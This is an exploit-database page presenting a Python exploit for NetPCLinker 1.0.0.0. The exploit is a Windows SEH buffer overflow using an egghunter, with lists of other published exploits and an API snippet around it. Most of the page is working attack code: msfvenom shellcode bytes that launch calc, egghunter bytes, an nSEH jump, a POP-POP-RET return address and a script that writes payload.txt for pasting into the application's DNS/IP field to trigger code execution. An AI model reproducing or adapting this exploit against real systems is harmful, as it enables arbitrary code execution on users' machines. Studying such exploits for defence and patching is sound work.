To access the dashboard, Schedule scans, API and Search become a patron

Search for hundreds of thousands of exploits

"NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)"

Author

Exploit author

"Saeed reza Zamanian"

Platform

Exploit platform

windows

Release date

Exploit published date

2020-07-22

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
# Exploit Title: NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)
# Date: 2019-06-28
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: https://sourceforge.net/projects/netpclinker/
# Software Link: https://sourceforge.net/projects/netpclinker/files/
# Version: 1.0.0.0
# Tested on: Windows Vista SP1

#!/usr/bin/python

'''
# Replicate Crash:
  1) Install and Run the application
  2) Go to second tab "Clients Control Panel"
  3) Press Add button
  4) Run the exploit , the exploit creates a text file named payload.txt
  5) Copy payload.txt contents into the add client dialog , "DNS/IP" field
  6) Press OK . Your shellcode will be executed by pressing OK button.

'''

#msfvenom -p windows/exec CMD=calc -f c -b "\x00\x0a\x0d\x33\x35\x36"
#Bad Characters : \x0a\x0d\x33\x35\x36

shellcode = (
"\xdb\xc4\xd9\x74\x24\xf4\x5b\xbe\x9a\x32\x43\xd2\x31\xc9\xb1"
"\x30\x83\xc3\x04\x31\x73\x14\x03\x73\x8e\xd0\xb6\x2e\x46\x96"
"\x39\xcf\x96\xf7\xb0\x2a\xa7\x37\xa6\x3f\x97\x87\xac\x12\x1b"
"\x63\xe0\x86\xa8\x01\x2d\xa8\x19\xaf\x0b\x87\x9a\x9c\x68\x86"
"\x18\xdf\xbc\x68\x21\x10\xb1\x69\x66\x4d\x38\x3b\x3f\x19\xef"
"\xac\x34\x57\x2c\x46\x06\x79\x34\xbb\xde\x78\x15\x6a\x55\x23"
"\xb5\x8c\xba\x5f\xfc\x96\xdf\x5a\xb6\x2d\x2b\x10\x49\xe4\x62"
"\xd9\xe6\xc9\x4b\x28\xf6\x0e\x6b\xd3\x8d\x66\x88\x6e\x96\xbc"
"\xf3\xb4\x13\x27\x53\x3e\x83\x83\x62\x93\x52\x47\x68\x58\x10"
"\x0f\x6c\x5f\xf5\x3b\x88\xd4\xf8\xeb\x19\xae\xde\x2f\x42\x74"
"\x7e\x69\x2e\xdb\x7f\x69\x91\x84\x25\xe1\x3f\xd0\x57\xa8\x55"
"\x27\xe5\xd6\x1b\x27\xf5\xd8\x0b\x40\xc4\x53\xc4\x17\xd9\xb1"
"\xa1\xe8\x93\x98\x83\x60\x7a\x49\x96\xec\x7d\xa7\xd4\x08\xfe"
"\x42\xa4\xee\x1e\x27\xa1\xab\x98\xdb\xdb\xa4\x4c\xdc\x48\xc4"
"\x44\xbf\x0f\x56\x04\x40"
)

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x65\x7a\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
nSEH = '\xEB\xAA\x90\x90' #Jump Back

# (Vista)
# PPR(ecx)  : 0x00494b67 : startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [NPL.exe] 
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.0 (C:\Program Files\NetPCLinker\NPL.exe)

SEH =  '\x67\x4b\x49'
offset = "RezaReza"+shellcode +'\x41'*(1199-8-len(shellcode)-len(egghunter)-50)

payload = offset+egghunter+"\x90"*50+nSEH+SEH

try:
    f=open("payload.txt","w")
    print("[+] Creating %s bytes payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
Release Date Title Type Platform Author
2020-11-20 "Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)" local windows ZwX
2020-11-20 "Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)" local windows "Vincent Wolterman"
2020-11-20 "Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit" local windows stresser
2020-11-20 "WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-11-20 "IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow" local windows "Paolo Stagno"
2020-11-19 "Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)" dos windows "Vincent Wolterman"
2020-11-19 "M/Monit 3.7.4 - Privilege Escalation" webapps multiple "Dolev Farhi"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-19 "PESCMS TEAM 2.3.2 - Multiple Reflected XSS" webapps multiple icekam
2020-11-19 "M/Monit 3.7.4 - Password Disclosure" webapps multiple "Dolev Farhi"
Release Date Title Type Platform Author
2020-07-22 "NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)" local windows "Saeed reza Zamanian"
2020-07-06 "Fire Web Server 0.1 - Remote Denial of Service (PoC)" dos windows "Saeed reza Zamanian"
2017-10-02 "NPM-V (Network Power Manager) 2.4.1 - Password Reset" webapps hardware "Saeed reza Zamanian"
2017-06-26 "Eltek SmartPack - Backdoor Account" webapps hardware "Saeed reza Zamanian"
2016-09-27 "NetMan 204 - Backdoor Account" remote hardware "Saeed reza Zamanian"
2016-09-06 "PHPIPAM 1.2.1 - Multiple Vulnerabilities" webapps php "Saeed reza Zamanian"
2016-03-21 "D-Link DWR-932 Firmware 4.00 - Authentication Bypass" webapps hardware "Saeed reza Zamanian"
2016-02-20 "SOLIDserver < 5.0.4 - Local File Inclusion" webapps php "Saeed reza Zamanian"
2014-01-20 "AfterLogic Pro and Lite 7.1.1.1 - Persistent Cross-Site Scripting" webapps php "Saeed reza Zamanian"
2014-01-17 "SmarterMail Enterprise and Standard 11.x - Persistent Cross-Site Scripting" webapps asp "Saeed reza Zamanian"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48680/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.